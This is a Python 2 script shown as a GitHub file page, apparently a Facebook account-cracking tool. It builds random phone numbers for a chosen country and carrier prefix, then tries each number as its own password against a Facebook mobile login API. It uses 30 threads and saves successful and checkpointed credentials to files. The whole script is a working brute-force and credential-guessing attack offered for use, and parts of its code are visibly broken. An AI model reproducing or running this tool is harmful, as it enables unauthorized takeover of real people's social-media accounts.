-
Notifications
You must be signed in to change notification settings - Fork 4
/
ashik-bit.py
408 lines (377 loc) · 11.7 KB
/
ashik-bit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
#!/usr/bin/python2
#coding=utf-8
#Author Angga Kurniawan
#Ngapain??
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass
os.system('rm -rf .txt')
for n in range(1000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print(nmbr)
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install requests')
try:
import mechanize
except ImportError:
os.system('pip2 install mechanize')
time.sleep(1)
os.system('python2 nmbr.py')
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('user-agent','Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def exb():
print '[!] Exit'
os.sys.exit()
def psb(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def t():
time.sleep(1)
def cb():
os.system('clear')
##### LOGO #####
lo
\033[1;97m░█████╗░ ░█████╗░███╗░░██╗██╗░░░██╗
\033[1;97m██╔══██╗ ██╔══██╗████╗░██║██║░░░██║
\033[1;97m███████║ ███████║██╔██╗██║██║░░░██║
\033[1;97m██╔══██║ ██╔══██║██║╚████║██║░░░██║
\033[1;97m██║░░██║ ██║░░██║██║░╚███║╚██████╔╝
\033[1;97m╚═╝░░╚═╝ ╚═╝░░╚═╝╚═╝░░╚══╝░╚═════╝░
\033[1;97m
\033[1;97m
\033[1;97m
\033[1;97m
\033[1;97m
\033[1;97m ASHIK & LEJON KHAN OFFICIAL
\033[1;97m--------------------------------------------------
\033[1;97m➣ Author : AYMAN AHMED ASHIK
\033[1;97m➣ Version : V1.1.1
\033[1;97m➣ Facebook :www.facebook.com/aashikbanaya.aa10
\033[1;97m➣ Help : Any Help Contact Me On Facebook.
\033[1;97m--------------------------------------------------
'''
correctname = ASHIK
CorrectPassword = LEJON
os.system('clear')
print logo
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m➣ Username Tools : ")
if (username == CorrectUsername):
password = raw_input("\033[1;97m➣ Password Tools : ")
if (password == CorrectPassword):
print "[✓] Logged in successfully as \n " + username
loop = 'false'
else:
print "Wrong Password"
else:
print "Wrong Username"
back = 0
successful = []
cpb = []
oks = []
id = []
def menu():
os.system('clear')
print logo
print '\033[1;97m[1]\033[1;97m Bangladesh'
print '\033[1;97m[2]\033[1;97m USA'
print '\033[1;97m[3]\033[1;97m UK'
print '\033[1;97m[4] \033[1;97m India'
print '\033[1;97m[5]\033[1;97m Brazil'
print '\033[1;97m[6]\033[1;97m Japan'
print '\033[1;97m[7]\033[1;97m Korea'
print '\033[1;97m[8]\033[1;97m Italy'
print '\033[1;97m[9]\033[1;97m Spain'
print '\033[1;97m[10]\033[1;97m Poland'
print '\033[1;97m[11]\033[1;97m Pakistan'
print '\033[1;97m[12]\033[1;97m Indonesia'
print '\033[1;97m[13]\033[1;97m Iran'
print '\033[1;97m[14]\033[1;97m Grecee'
print '\033[1;97m[0] Exit '
print "\033[1;97m--------------------------------------------------\n"
action()
def action():
bch = raw_input('\n\033[1;97m▄︻̷̿┻̿═━一 ')
if bch =='':
print '[!] Fill in correctly'
action()
elif bch =="1":
os.system("clear")
print (logo)
print("\033[1;97m175,165,191,192,193,194,195,196,197,198,199")
try:
c = raw_input("\033[1;97m choose code : ")
k="+880"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="2":
os.system("clear")
print (logo)
print("786, 815, 315, 256, 401, 718, 917, 202, 701, 303, 703, 803, 999, 708")
try:
c = raw_input(" choose code : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="3":
os.system("clear")
print (logo)
print("737, 706, 748, 783, 739, 759, 790")
try:
c = raw_input(" choose code : ")
k="+44"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="4":
os.system("clear")
print (logo)
print("954, 897, 967, 937, 700, 727, 965, 786, 874, 856, 566, 590, 527, 568, 578")
print("901, 902, 903, 930, 933, 935, 936, 937, 938, 939")
try:
c = raw_input(" choose code : ")
k="+91"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="5":
os.system("clear")
print (logo)
print("127, 179, 117, 853, 318, 219, 834, 186, 479, 113")
try:
c = raw_input(" choose code : ")
k="+55"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="6":
os.system("clear")
print (logo)
print("11,12,19,16,15,13,14,18,17")
try:
c = raw_input(" choose code : ")
k="+81"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="7":
os.system("clear")
print (logo)
print("1, 2, 3, 4, 5, 6, 7, 8, 9")
try:
c = raw_input(" choose code : ")
k="+82"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="8":
os.system("clear")
print (logo)
print("388, 390, 391, 371, 380, 368, 386, 384, 332, 344, 351, 328")
try:
c = raw_input(" choose code : ")
k="+39"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="9":
os.system("clear")
print (logo)
print("60, 76, 73, 64, 69, 77, 65, 61, 75, 68")
try:
c = raw_input(" choose code : ")
k="+34"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="10":
os.system("clear")
print (logo)
print("66, 69, 78, 79, 60, 72, 67, 53, 51")
try:
c = raw_input(" choose code : ")
k="+48"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="11":
os.system("clear")
print (logo)
print("\033[1;97mJazz Bangladesh : 00,01,02,03,04,05,06,07,08,09")
print("\033[1;97mZong Bangladesh : 10,11,12,13,14,15,16,17,18")
print("\033[1;97mWarid Bangladesh : 20,21,22,23,24")
print("\033[1;97mUfone Bangladesh : 30,31,32,33,34,35,36,37")
print("\033[1;97mTelenor Bangladesh : 40,41,42,43,44,45,46,47,48,49")
try:
c = raw_input(" choose code : ")
k="+92"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="12":
os.system("clear")
print (logo)
print("\033[1;97m81, 83, 85, 84, 89,")
try:
c = raw_input(" choose code : ")
k="+1"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="13":
os.system("clear")
print (logo)
print("\033[1;97m901, 902, 903, 930, 933, 935, 936, 937, 938, 939")
try:
c = raw_input(" choose code : ")
k="+98"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="14":
os.system("clear")
print (logo)
print("\033[1;97m69, 693, 698, 694, 695")
try:
c = raw_input(" choose code : ")
k="+3069"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =="15":
os.system("clear")
print (logo)
print("\033[1;97mJazz Pakistan: 00,01,02,03,04,05,06,07,08,09")
print("\033[1;97mZong Pakistan: 10,11,12,13,14,15,16,17,18")
print("\033[1;97mWarid Pakistan: 20,21,22,23,24")
print("\033[1;97mUfone Pakistan: 30,31,32,33,34,35,36,37")
print("\033[1;97mTelenor Pakistan: 40,41,42,43,44,45,46,47,48,49")
try:
c = raw_input(" choose code : ")
k="+92"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
menu()
elif bch =='0':
exb()
else:
print '[!] Fill in correctly'
action()
xxx = str(len(id))
psb ('[✓] Total Numbers: '+xxx)
time.sleep(0.5)
psb ('\033[1;97m[✓]\033[1;97m Please wait, process is running ...')
time.sleep(0.5)
psb ('[!] To Stop Process Press CTRL Then Press z')
time.sleep(0.5)
print "\033[1;97m--------------------------------------------------"
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[LOGIN]\033[1;97m ' + k + c + user + ' | ' + pass1+'\n'+"\n"
okb = open('save/successfull.txt', 'a')
okb.write(k+c+user+'⊱⊹⊰'+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[7 DAYS] ' + k + c + user + ' | ' + pass1+'\n'
cps = open('save/checkpoint.txt', 'a')
cps.write(k+c+user+'⊱⊹⊰'+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;97m--------------------------------------------------"
print '[✓] Process Has Been Completed ....'
print '[✓] Total OK/CP : '+str(len(oks))+'/'+str(len(cpb))
print('[✓] CP File Has Been Saved : save/checkpoint.txt')
raw_input('\n[Press Enter To Go Back]')
menu()
if __name__ == '__main__':
menu()